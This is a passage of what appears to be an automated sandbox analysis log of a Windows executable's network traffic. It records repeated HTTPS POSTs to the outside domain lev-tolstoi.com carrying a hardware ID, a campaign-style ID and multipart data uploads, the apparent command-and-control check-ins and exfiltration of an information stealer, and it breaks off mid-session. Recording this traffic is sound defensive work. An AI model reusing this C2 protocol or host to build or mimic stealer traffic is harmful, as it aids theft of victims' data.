                                                                                                                                                                                                                                                              2024-12-26 11:57:17 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
                                                                                                                                                                                                                                                              2024-12-26 11:57:18 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Thu, 26 Dec 2024 11:57:18 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=i66qudpd8lu6lr0luafltvvmre; expires=Mon, 21 Apr 2025 05:43:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Alxz1CAjOwZsoThQplX%2BxmDoR8WYU%2B%2B0u793sSROZpe7Lcx9rPu82ZcxJsEqIM41MJJW3ua88kKDqjtAwbkv84k%2BweN44IQ6aMfP14THfyN9CHuJ186NYAUA6x6MwNL7r6E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f80e479bbfd80d0-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1466&min_rtt=1461&rtt_var=559&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=973&delivery_rate=1938911&cwnd=208&unsent_bytes=0&cid=4d380383512e7f22&ts=765&x=0"
                                                                                                                                                                                                                                                              2024-12-26 11:57:18 UTC244INData Raw: 34 64 64 34 0d 0a 63 58 4c 4c 6f 6e 6b 6d 33 7a 65 54 4c 4c 44 53 51 51 56 4d 74 32 67 6d 6c 68 59 53 33 49 2f 38 33 4a 54 73 70 43 72 76 41 51 51 4b 55 4c 32 41 51 78 4c 7a 46 65 42 4a 6b 75 67 31 64 7a 6e 53 52 41 54 33 63 6a 44 6d 36 5a 32 77 35 34 6d 49 43 4a 6c 73 4a 6b 73 55 71 73 34 4b 51 2f 4d 56 39 6c 53 53 36 42 70 2b 62 74 49 47 42 4b 77 30 64 37 62 74 6e 62 44 32 6a 63 39 46 6e 32 31 6e 47 52 36 73 79 68 78 46 75 31 62 2f 51 64 57 33 4a 47 51 6d 32 51 46 4c 2f 6e 73 77 38 4b 32 5a 70 72 62 57 68 6d 65 4b 64 57 55 38 45 37 6a 4a 57 31 76 7a 54 4c 46 4a 33 76 42 37 4a 79 33 53 43 6b 72 77 63 6e 6d 30 35 35 53 34 39 34 6a 4f 57 6f 5a 6e 62 42 6b 51 72 38 73 57 54 4b 39 62 39 55 62 65 73 53 35 6b 62 70 74 4b 51 2b
                                                                                                                                                                                                                                                              Data Ascii: 4dd4cXLLonkm3zeTLLDSQQVMt2gmlhYS3I/83JTspCrvAQQKUL2AQxLzFeBJkug1dznSRAT3cjDm6Z2w54mICJlsJksUqs4KQ/MV9lSS6Bp+btIGBKw0d7btnbD2jc9Fn21nGR6syhxFu1b/QdW3JGQm2QFL/nsw8K2ZprbWhmeKdWU8E7jJW1vzTLFJ3vB7Jy3SCkrwcnm055S494jOWoZnbBkQr8sWTK9b9UbesS5kbptKQ+
                                                                                                                                                                                                                                                              2024-12-26 11:57:18 UTC1369INData Raw: 77 30 4b 50 36 2b 72 4c 33 6e 6e 39 4e 46 6e 57 55 6d 44 46 36 77 67 42 78 49 2f 51 32 78 52 74 36 2b 4a 6d 51 68 30 67 74 45 35 6e 74 77 76 65 57 57 75 76 79 42 79 55 65 44 61 57 45 62 47 61 37 50 48 45 79 37 57 76 49 4f 6e 50 41 6b 66 32 36 4e 53 6d 54 6b 64 33 4f 71 34 49 2f 2b 36 63 44 66 43 49 70 76 4a 6b 74 51 72 38 34 61 53 62 31 48 2b 55 58 5a 74 54 46 73 4a 39 67 48 52 50 6c 2b 66 37 33 74 6d 62 54 38 67 63 78 4d 67 47 35 67 45 78 44 70 6a 6c 74 44 70 52 57 70 44 76 47 31 4d 32 41 69 77 30 68 2b 74 47 73 2b 70 36 32 5a 73 72 62 57 68 6b 43 49 59 47 55 59 48 36 72 49 45 46 61 39 52 2f 64 44 31 36 49 6c 59 69 44 66 43 56 62 2b 65 6e 61 39 35 4a 57 33 38 34 6e 43 43 4d 4d 6a 59 51 74 51 38 59 41 36 53 62 5a 5a 2b 31 6e 53 38 44 77 70 4e 35 55 4e 53
                                                                                                                                                                                                                                                              Data Ascii: w0KP6+rL3nn9NFnWUmDF6wgBxI/Q2xRt6+JmQh0gtE5ntwveWWuvyByUeDaWEbGa7PHEy7WvIOnPAkf26NSmTkd3Oq4I/+6cDfCIpvJktQr84aSb1H+UXZtTFsJ9gHRPl+f73tmbT8gcxMgG5gExDpjltDpRWpDvG1M2Aiw0h+tGs+p62ZsrbWhkCIYGUYH6rIEFa9R/dD16IlYiDfCVb+ena95JW384nCCMMjYQtQ8YA6SbZZ+1nS8DwpN5UNS
                                                                                                                                                                                                                                                              2024-12-26 11:57:18 UTC1369INData Raw: 78 34 4a 4c 2b 75 4d 37 42 55 4d 30 37 4a 6a 6b 54 76 63 4d 52 42 6f 68 57 2f 30 44 56 70 6d 4e 34 59 4d 78 4b 51 2f 67 30 4b 50 37 67 6e 37 62 77 6e 4d 6c 46 6a 6d 31 6f 48 42 57 6d 79 42 74 45 73 46 44 31 52 64 6d 7a 4c 6d 4d 38 33 77 70 4d 38 58 56 36 74 4b 33 51 2f 76 47 57 68 68 44 4e 55 6e 45 59 55 70 7a 44 46 55 71 36 51 37 46 52 6e 4b 6c 6a 59 43 4b 56 55 67 54 35 66 48 57 37 34 70 2b 30 2b 49 76 4d 52 49 56 74 5a 51 45 66 72 63 41 58 54 4c 64 59 2f 30 72 61 75 53 68 73 4b 4e 55 4c 54 72 51 36 4d 4c 6e 31 33 75 61 32 75 73 46 45 67 47 77 6b 4a 68 4f 6e 7a 68 78 53 2f 55 71 2f 56 35 4b 33 4c 79 64 32 6c 51 5a 4e 39 48 39 36 75 75 32 5a 73 2f 4f 4e 77 55 75 41 5a 47 77 64 46 36 33 4d 45 6b 6d 37 56 66 5a 4b 31 36 49 6d 62 69 4c 5a 53 67 71 30 63 32
                                                                                                                                                                                                                                                              Data Ascii: x4JL+uM7BUM07JjkTvcMRBohW/0DVpmN4YMxKQ/g0KP7gn7bwnMlFjm1oHBWmyBtEsFD1RdmzLmM83wpM8XV6tK3Q/vGWhhDNUnEYUpzDFUq6Q7FRnKljYCKVUgT5fHW74p+0+IvMRIVtZQEfrcAXTLdY/0rauShsKNULTrQ6MLn13ua2usFEgGwkJhOnzhxS/Uq/V5K3Lyd2lQZN9H96uu2Zs/ONwUuAZGwdF63MEkm7VfZK16ImbiLZSgq0c2
                                                                                                                                                                                                                                                              2024-12-26 11:57:18 UTC1369INData Raw: 2f 76 47 43 68 68 44 4e 61 6d 38 42 48 71 66 4a 46 6b 4b 31 55 76 39 44 32 62 59 6f 59 43 6e 54 42 30 7a 35 63 58 4f 2f 36 5a 53 73 39 59 58 4d 52 59 63 6a 4b 46 4d 58 73 59 42 44 42 4a 70 5a 32 46 37 4a 6f 6a 55 6e 4d 5a 73 54 42 50 4e 34 4d 4f 61 74 6e 62 48 2f 67 63 35 41 67 6d 78 69 48 52 61 76 7a 52 35 4c 74 30 66 35 51 4e 2b 37 4c 47 77 38 31 51 64 41 2b 48 42 34 74 65 66 65 38 4c 61 4a 33 67 6a 56 49 31 4d 65 48 36 6e 44 44 51 53 69 47 2b 67 4f 31 62 78 6a 50 32 37 5a 42 45 54 37 65 48 79 31 35 5a 2b 79 2b 49 6e 44 51 59 56 72 64 42 49 55 6f 63 45 56 53 37 78 52 39 45 76 57 74 79 64 68 49 5a 56 45 42 50 4e 73 4d 4f 61 74 73 5a 6e 44 7a 4f 64 79 7a 58 77 6f 43 6c 43 75 7a 46 73 63 2f 56 6e 79 51 74 71 2f 4a 57 34 69 33 77 4e 50 2b 48 39 30 73 75 53
                                                                                                                                                                                                                                                              Data Ascii: /vGChhDNam8BHqfJFkK1Uv9D2bYoYCnTB0z5cXO/6ZSs9YXMRYcjKFMXsYBDBJpZ2F7JojUnMZsTBPN4MOatnbH/gc5AgmxiHRavzR5Lt0f5QN+7LGw81QdA+HB4tefe8LaJ3gjVI1MeH6nDDQSiG+gO1bxjP27ZBET7eHy15Z+y+InDQYVrdBIUocEVS7xR9EvWtydhIZVEBPNsMOatsZnDzOdyzXwoClCuzFsc/VnyQtq/JW4i3wNP+H90suS
                                                                                                                                                                                                                                                              2024-12-26 11:57:18 UTC1369INData Raw: 38 64 4f 6e 32 52 76 41 52 36 6b 7a 78 4e 4d 74 46 54 31 53 39 2b 32 4c 32 30 76 30 67 52 4b 2f 44 51 2b 2f 75 71 47 2f 71 37 4f 35 31 69 57 63 58 41 65 4d 61 54 50 57 31 76 7a 54 4c 46 4a 33 76 42 37 4a 79 66 48 44 6b 6e 6d 66 58 65 77 34 70 32 73 39 34 50 4e 57 6f 70 73 59 68 51 63 72 38 38 64 52 62 68 66 2f 55 6e 58 75 79 78 72 62 70 74 4b 51 2b 77 30 4b 50 37 44 6c 61 33 68 6a 63 68 44 6d 33 67 6d 44 46 36 77 67 42 78 49 2f 51 32 78 54 64 6d 37 4a 32 63 69 31 51 35 4a 39 47 5a 2f 75 65 71 58 74 65 53 45 77 55 2b 47 61 32 30 63 46 72 76 4d 46 56 61 34 52 2b 4d 4f 6e 50 41 6b 66 32 36 4e 53 6e 4c 7a 5a 47 43 39 72 36 2b 6f 39 5a 6a 4e 52 59 45 6a 65 56 30 4a 36 63 63 58 42 4f 55 56 39 30 48 62 73 79 78 6d 4a 39 6b 48 51 66 31 78 63 62 6a 70 6c 4c 54 32
                                                                                                                                                                                                                                                              Data Ascii: 8dOn2RvAR6kzxNMtFT1S9+2L20v0gRK/DQ+/uqG/q7O51iWcXAeMaTPW1vzTLFJ3vB7JyfHDknmfXew4p2s94PNWopsYhQcr88dRbhf/UnXuyxrbptKQ+w0KP7Dla3hjchDm3gmDF6wgBxI/Q2xTdm7J2ci1Q5J9GZ/ueqXteSEwU+Ga20cFrvMFVa4R+MOnPAkf26NSnLzZGC9r6+o9ZjNRYEjeV0J6ccXBOUV90HbsyxmJ9kHQf1xcbjplLT2
                                                                                                                                                                                                                                                              2024-12-26 11:57:18 UTC1369INData Raw: 49 74 66 31 4d 58 70 59 42 44 42 4c 35 53 38 6b 2f 59 75 53 39 6f 4b 64 45 59 54 76 4e 6d 63 62 2f 6d 6b 37 4c 32 67 38 74 43 6a 47 70 72 48 78 32 75 78 78 52 42 2f 52 75 78 53 63 72 77 65 79 63 50 32 41 46 49 72 79 34 77 6f 61 4f 48 2f 76 47 43 68 68 44 4e 59 32 77 57 47 71 54 44 46 45 65 76 56 50 64 63 30 72 30 70 64 53 54 65 44 30 6e 35 65 58 4f 34 36 35 57 79 35 49 66 47 53 34 59 6a 4b 46 4d 58 73 59 42 44 42 4a 35 43 35 30 54 56 76 44 56 73 4c 39 59 63 53 65 51 30 50 76 37 38 6d 61 2b 32 31 74 42 59 6d 6d 52 35 58 51 6e 70 78 78 63 45 35 52 58 33 52 39 53 33 4a 57 6b 38 30 41 78 4c 2b 33 31 35 75 75 57 64 76 76 4b 4b 77 55 32 4f 62 32 30 55 45 36 62 45 45 6b 71 30 57 72 45 41 6b 72 63 37 4a 33 61 56 4b 31 2f 33 65 48 33 2b 38 74 43 6e 74 6f 6e 4b 43
                                                                                                                                                                                                                                                              Data Ascii: Itf1MXpYBDBL5S8k/YuS9oKdEYTvNmcb/mk7L2g8tCjGprHx2uxxRB/RuxScrweycP2AFIry4woaOH/vGChhDNY2wWGqTDFEevVPdc0r0pdSTeD0n5eXO465Wy5IfGS4YjKFMXsYBDBJ5C50TVvDVsL9YcSeQ0Pv78ma+21tBYmmR5XQnpxxcE5RX3R9S3JWk80AxL+315uuWdvvKKwU2Ob20UE6bEEkq0WrEAkrc7J3aVK1/3eH3+8tCntonKC
                                                                                                                                                                                                                                                              2024-12-26 11:57:18 UTC1369INData Raw: 4c 55 49 6e 4c 44 55 47 36 51 37 4e 37 30 62 34 74 59 44 69 56 46 58 75 36 4e 48 48 2b 74 61 65 6e 74 70 69 47 45 4e 38 74 4a 67 46 51 38 59 42 63 52 36 39 48 39 30 33 45 73 32 52 5a 45 50 49 63 54 76 4e 6b 64 36 6e 69 33 76 43 32 67 59 59 51 74 43 4e 76 46 41 75 34 31 68 5a 55 75 68 58 4f 41 4a 4b 6f 59 7a 39 75 34 41 6c 4b 2b 6e 4e 6d 72 36 43 35 71 50 79 4a 31 6b 2b 61 62 43 5a 64 55 4b 2b 41 51 78 66 7a 46 66 56 66 6b 75 68 7a 4e 58 57 41 57 52 4f 6b 4a 6d 2f 77 39 4e 36 6f 74 74 61 55 42 73 31 78 4a 6b 74 51 37 73 4d 4a 56 72 74 57 35 30 32 56 6a 68 31 41 4e 4e 67 4d 55 2b 56 4b 54 72 6e 33 6b 37 6a 68 6e 34 70 64 6a 6d 31 6f 46 41 62 70 6a 6c 74 4c 2f 51 33 49 44 70 72 77 48 43 6c 75 7a 55 6f 63 74 45 46 7a 73 4f 4f 5a 71 4f 66 44 34 56 4b 41 5a 58
                                                                                                                                                                                                                                                              Data Ascii: LUInLDUG6Q7N70b4tYDiVFXu6NHH+taentpiGEN8tJgFQ8YBcR69H903Es2RZEPIcTvNkd6ni3vC2gYYQtCNvFAu41hZUuhXOAJKoYz9u4AlK+nNmr6C5qPyJ1k+abCZdUK+AQxfzFfVfkuhzNXWAWROkJm/w9N6ottaUBs1xJktQ7sMJVrtW502Vjh1ANNgMU+VKTrn3k7jhn4pdjm1oFAbpjltL/Q3IDprwHCluzUoctEFzsOOZqOfD4VKAZX
                                                                                                                                                                                                                                                              2024-12-26 11:57:18 UTC1369INData Raw: 6d 46 73 44 76 6b 66 6a 53 4e 47 6d 49 43 41 51 36 79 31 4b 38 33 56 6d 72 76 71 52 67 4d 69 62 78 55 61 44 5a 48 41 43 55 4f 65 41 46 41 54 6c 62 4c 45 47 6b 6f 39 74 4a 7a 61 56 55 67 54 42 64 33 36 77 36 6f 69 76 75 36 6e 49 54 34 78 31 64 67 51 66 36 59 35 62 51 76 30 4e 6f 77 43 53 74 44 49 6e 64 6f 56 59 48 36 45 6e 4a 2b 36 2f 67 66 44 76 7a 74 41 49 31 54 45 6f 55 77 4c 70 6d 46 73 44 76 6b 66 6a 53 4e 47 6d 49 43 41 51 36 79 31 4b 38 33 56 6d 72 76 71 52 38 64 69 34 35 33 61 7a 64 6d 55 64 48 71 37 57 43 67 54 7a 46 66 34 4f 69 6f 6c 6a 4c 32 37 71 52 41 54 73 4e 43 6a 2b 32 4a 32 77 2b 49 6e 51 57 63 42 45 61 42 51 52 76 39 41 4d 53 2f 4a 37 78 32 2b 53 2f 6d 4e 68 62 6f 31 59 43 72 52 77 59 66 36 31 7a 75 79 74 32 35 55 66 33 54 46 35 58 51 6e
                                                                                                                                                                                                                                                              Data Ascii: mFsDvkfjSNGmICAQ6y1K83VmrvqRgMibxUaDZHACUOeAFATlbLEGko9tJzaVUgTBd36w6oivu6nIT4x1dgQf6Y5bQv0NowCStDIndoVYH6EnJ+6/gfDvztAI1TEoUwLpmFsDvkfjSNGmICAQ6y1K83VmrvqR8di453azdmUdHq7WCgTzFf4OioljL27qRATsNCj+2J2w+InQWcBEaBQRv9AMS/J7x2+S/mNhbo1YCrRwYf61zuyt25Uf3TF5XQn
                                                                                                                                                                                                                                                              2024-12-26 11:57:18 UTC1369INData Raw: 50 31 34 34 30 6e 43 73 32 4d 70 62 74 6c 4b 48 4c 52 35 59 72 6e 39 6e 66 4c 78 6c 4d 45 49 6b 69 31 2f 55 77 62 70 6d 45 67 4b 2f 55 65 78 46 70 4c 33 4c 57 6f 76 31 67 52 48 35 6d 5a 32 76 66 75 64 2b 63 69 77 36 31 71 4b 63 32 56 52 49 61 54 45 44 56 47 2b 52 66 5a 77 37 4a 30 78 59 44 37 57 53 47 6a 7a 65 58 79 41 30 36 6d 76 38 5a 36 45 62 6f 35 31 5a 56 4e 65 36 64 68 62 48 50 31 34 34 30 6e 43 73 32 46 4c 4b 64 67 47 42 4f 73 36 61 66 37 37 33 75 61 6c 77 49 5a 61 7a 54 73 6d 56 42 4f 37 30 68 31 48 71 31 61 32 63 4f 79 64 4d 57 41 2b 31 6b 68 31 2b 58 42 6d 71 2b 36 4f 75 63 69 77 36 31 71 4b 63 32 56 52 4e 5a 4f 43 4b 6c 4b 2b 56 66 39 4a 6b 76 35 6a 66 32 36 4e 53 6d 6e 6d 63 32 43 39 72 37 75 45 74 4c 2f 51 53 34 31 74 59 56 4e 65 36 63 78 62
                                                                                                                                                                                                                                                              Data Ascii: P1440nCs2MpbtlKHLR5Yrn9nfLxlMEIki1/UwbpmEgK/UexFpL3LWov1gRH5mZ2vfud+ciw61qKc2VRIaTEDVG+RfZw7J0xYD7WSGjzeXyA06mv8Z6Ebo51ZVNe6dhbHP1440nCs2FLKdgGBOs6af773ualwIZazTsmVBO70h1Hq1a2cOydMWA+1kh1+XBmq+6Ouciw61qKc2VRNZOCKlK+Vf9Jkv5jf26NSmnmc2C9r7uEtL/QS41tYVNe6cxb


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              3192.168.2.849708172.67.157.254443768C:\Users\user\Desktop\SPFFah2O2q.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-26 11:57:19 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=8J142MQV1V1XV7FQN
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 12835
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                                              2024-12-26 11:57:19 UTC12835OUTData Raw: 2d 2d 38 4a 31 34 32 4d 51 56 31 56 31 58 56 37 46 51 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 39 44 44 36 33 42 43 46 34 38 39 30 46 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 38 4a 31 34 32 4d 51 56 31 56 31 58 56 37 46 51 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 4a 31 34 32 4d 51 56 31 56 31 58 56 37 46 51 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 38 4a 31 34
                                                                                                                                                                                                                                                              Data Ascii: --8J142MQV1V1XV7FQNContent-Disposition: form-data; name="hwid"09DD63BCF4890FFCAC8923850305D13E--8J142MQV1V1XV7FQNContent-Disposition: form-data; name="pid"2--8J142MQV1V1XV7FQNContent-Disposition: form-data; name="lid"4h5VfH----8J14
                                                                                                                                                                                                                                                              2024-12-26 11:57:20 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Thu, 26 Dec 2024 11:57:20 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=3ng2vbbha0pons187lk3aelu8h; expires=Mon, 21 Apr 2025 05:43:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNB%2BZsDmqDgCPoL4ypgOzSlAefIiImbciGwCOUfhBZDDQYlVpxB3lWvpUR38spj8WDmoLF%2BR6zclKY%2BOcvRJcg8j0JZ58iDA%2FpKVzgFMEIp0Qq1nJ9dzrnAFM%2F%2BuMQN6p6o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f80e488a8654232-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1777&rtt_var=686&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13773&delivery_rate=1572428&cwnd=214&unsent_bytes=0&cid=a4a17cd59acdac94&ts=906&x=0"
                                                                                                                                                                                                                                                              2024-12-26 11:57:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-26 11:57:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              4192.168.2.849709172.67.157.254443768C:\Users\user\Desktop\SPFFah2O2q.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-26 11:57:22 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=6IMCKCBFIN3LBJ
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 15046
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                                              2024-12-26 11:57:22 UTC15046OUTData Raw: 2d 2d 36 49 4d 43 4b 43 42 46 49 4e 33 4c 42 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 39 44 44 36 33 42 43 46 34 38 39 30 46 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 49 4d 43 4b 43 42 46 49 4e 33 4c 42 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 49 4d 43 4b 43 42 46 49 4e 33 4c 42 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 36 49 4d 43 4b 43 42 46 49 4e 33 4c 42
                                                                                                                                                                                                                                                              Data Ascii: --6IMCKCBFIN3LBJContent-Disposition: form-data; name="hwid"09DD63BCF4890FFCAC8923850305D13E--6IMCKCBFIN3LBJContent-Disposition: form-data; name="pid"2--6IMCKCBFIN3LBJContent-Disposition: form-data; name="lid"4h5VfH----6IMCKCBFIN3LB
                                                                                                                                                                                                                                                              2024-12-26 11:57:23 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Thu, 26 Dec 2024 11:57:23 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=gnecmd8eh4uhrtj07lhgvq6uq2; expires=Mon, 21 Apr 2025 05:44:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2BiHqWQOaiZH4qKFH5VCO9mnEMJyS5H7a%2BKMOFKeLOduoGcYQ2ESOShIlxO5osV0QcegFuoPWNxhtRdr0CLWimhngeEIHu6nsqq%2BpVTH082CN5P%2BoQ9yK0YuDiAzwqI0C48%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f80e499bd687d1a-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1976&min_rtt=1970&rtt_var=751&sent=12&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15981&delivery_rate=1445544&cwnd=179&unsent_bytes=0&cid=bcfdaf2ee4120ca9&ts=843&x=0"
                                                                                                                                                                                                                                                              2024-12-26 11:57:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-26 11:57:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              5192.168.2.849711172.67.157.254443768C:\Users\user\Desktop\SPFFah2O2q.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-26 11:57:25 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=KPY7NXQGMQLQACUMS9
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20237
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
